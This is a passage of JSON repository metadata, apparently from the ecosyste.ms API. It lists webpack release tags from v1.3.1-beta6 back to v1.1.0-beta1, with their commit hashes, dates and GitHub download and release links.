104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sh